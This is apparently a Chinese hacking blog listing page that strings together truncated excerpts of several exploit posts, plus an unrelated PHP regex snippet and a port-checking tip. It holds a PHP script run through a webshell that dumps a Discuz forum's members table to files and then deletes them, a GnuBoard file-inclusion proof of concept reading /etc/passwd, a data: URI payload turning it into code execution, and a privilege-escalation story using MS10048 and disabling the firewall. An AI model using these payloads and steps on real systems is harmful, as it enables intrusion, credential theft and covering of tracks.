author:my5t3ry
转载请注明:t00ls.net
漏洞位于注册页面的\User\Reg\RegAjax.asp 中的24 – 46行 和 254 -270 行 代码如下:
Class Ajax_Check
Private KS
Private Sub Class_Initialize()
Set KS=New PublicCls
End Sub
Private Sub Class_Terminate()
Set KS=Nothing
End Sub
Public Sub Kesion()
Select Case KS.S(“Action”)
Case “checkusername”
Call CheckUserName()
Case “checkemail”
Call CheckEmail()
Case “checkcode”
Call CheckCode()
Case “getregform”
Call GetRegForm()
Case “getcityoption”
Call getCityOption()
End Select
End Sub
……略去无关代码 阅读全文…
author:toby57
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
这儿利用的是马儿的专家模式(自己写代码)。
ini_set(‘display_errors’, 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(“:/var/tmp/mysql.sock”, “forum”, “xx!!xx3″) or die(“Could not connect: ” . mysql_error());
mysql_select_db(“discuz”,$connx) or die(“Could not connect: ” . mysql_error());
$result = mysql_query(“Select * FROM members”,$connx) or die(“Could not connect: ” . mysql_error());
$i = 0;
$tmp = ”;
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
$i = $i+1;
$tmp .= implode(“::”, $row).”\n”;
if(!($i%500)){//500条写入一个文件
$filename = ‘/home/httpd/bbs.xxxxx/forumdata/cache/user’.intval($i/500).’.txt’;
file_put_contents($filename,$tmp);
$tmp = ”;
}
}
mysql_free_result($result);
//down完后delete
ini_set(‘display_errors’, 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
$i = $i+1;
$filename = ‘/home/httpd/bbs.xxxx/forumdata/cache/user’.$i.’.txt’;
unlink($filename);
}
by Ryat[puretot]
mail: puretot at gmail dot com
team: http://www.80vul.com
发现时间 2008-10-02
公开时间 2011-02-27
漏洞影响版本 2.1.0 2.1.1
状态 已修补
漏洞代码如下:
// go.php
$q_url=$_SERVER["REQUEST_URI"];
@list($relativePath, $rawURL)=@explode(‘/go.php/’, $q_url);
$rewritedURL=$rawURL; // 来自$_SERVER["REQUEST_URI"],可以任意提交的:)
…
$RewriteRules[]=”/component\/([^\/]+)\/?/”;
// 这个正则限制的不够细致,可以很轻易的绕过:)
… 阅读全文…
author: bin
<%
Server.execute(request(“file”))
%>
与include的区别,它可以动态包含文件。
被包含文件里面可执行ASP代码,在国外的源码中有使用的。
include.asp?file=./1.txt
1.txt
<%response.write(now())%>
PHP正则表达式修饰符的应用是我们在进行PHP正则表达式开发的时候经常会使用的,那么关于PHP正则表达式修饰符我们需要掌握什么呢?那么本文就向你介绍详细内容。
我们在PHP正则表达式的学习中会碰到修饰符,那么关于PHP正则表达式修饰符的理解以及使用我们需要注意什么呢?那么我们来具体的看看它的概念以及相关内容。在学习PHP正则表达式修饰符之前先来理解下贪婪模式,前面在元字符中提到过”?”还有一个重要的作用,即”贪婪模式”,什么是”贪婪模式” 呢?
PHP正则表达式贪婪模式: 阅读全文…
#my5t3ry:这个利用比较特别,记录一下
By Flyh4t
http://bbs.wolvez.org/
GnuBoard是韩国比较常见的一个论坛,存在较多的漏洞,其中common.php存在一个文件包含漏洞
看common.php代码<!–more–>
@extract($_GET);
@extract($_POST);
@extract($_SERVER);
……
if (!$g4_path || preg_match(“/:\/\//”, $g4_path))
die(“<meta http-equiv=’content-type’ content=’text/html; charset=$g4[charset]‘><script language=’JavaScript’> alert(‘肋给等 规过栏肺 函荐啊 沥狼登菌嚼聪促.’); </script>”);
//if (!$g4_path) $g4_path = “.”;
$g4['path'] = $g4_path; //只限制了$g4_path不能有字符 ://
unset($g4_path);
include_once(“$g4[path]/lib/constant.php”); //本地文件包含漏洞
include_once(“$g4[path]/config.php”);
POC:
http://test.com/GnuBoard/common.php?g4_path=../../../../../../../etc/passwd%00
———————————————————————————–
在Ryat牛的提示下,这个本地包含晋升为远程代码执行漏洞。
bypass_local.php
<?php
if (!$g4_path || preg_match(“/:\/\//”, $g4_path))
die(“fuck”);
$g4['path'] = $g4_path;
unset($g4_path);
include_once(“$g4[path]/lib/constant.php”);
?>
在allow_url_include = On且PHP >= 5.2.0的条件下
提交bypass_local.php?g4_path=data:;base64,PD9waHBpbmZvKCk7Lyo=
成功执行phpinfo()
这种方法不算新,可是很少人用,也很少人能想得到。
http://hi.baidu.com/cncxz/blog/item/8d6aaa08d1d96fbc2fddd4ee.html
data:类似于javascript:,在很大程度上,可以完成javascript的工作.
举一个例子:
进行XSS测试时,发现javascript与script等关键字都被过滤了(现在一般有点XSS意识的管理员都懂得过滤这两个关键字)。可用下面的语句:
阅读全文…
author:cnbird
经常我们在启动应用的时候发现系统需要的端口被别的程序占用,如何知道谁占有了我们需要的端口,很多人都比较头疼,下面就介绍一种非常简单的方法,希望对大家有用假如我们需要确定谁占用了我们的9050端口
1、Windows平台
在windows命令行窗口下执行:
C:\>netstat -aon|findstr “9050″ TCP 127.0.0.1:9050
0.0.0.0:0 LISTENING 2016
看到了吗,端口被进程号为2016的进程占用,继续执行下面命令:
C:\>tasklist|findstr “2016″
tor.exe 2016 Console 0 16,064 K
很清楚吧,tor占用了你的端口
author:M4tr1x
一日从朋友处得到一网站权限,让我帮忙提权。拿到后看了看,C、D盘有只读权限,C:\Documents and Settings\All Users\Documents 可写。 没有装FTP软件和数据库。wscript.shell没有被禁用, 终端端口被改成45678 。试了试从外网连不上45678端口,用LCX也导不出来,本以为是WINDOWS自带的防火墙或者IPSEC。不过防火墙的事拿到系统权限了再搞吧。
找了找本地溢出的漏洞,貌似只有MS08067和MS10048,不过在服务器的D盘根目录发现个KB958644.exe ,这个应该是MS08067的补丁,把MS10048.exe传到C:\Documents and Settings\All Users\Documents目录里,运行ms10048 Whoami,返回nt authority\system,为系统权限。 接下来关掉防火墙 执行net stop policyagent和net stop sharedaccess .发现45678端口还是连不上,郁闷至极,ping 外网IP也不通 。 执行一下tracert 220.181.6.175 阅读全文…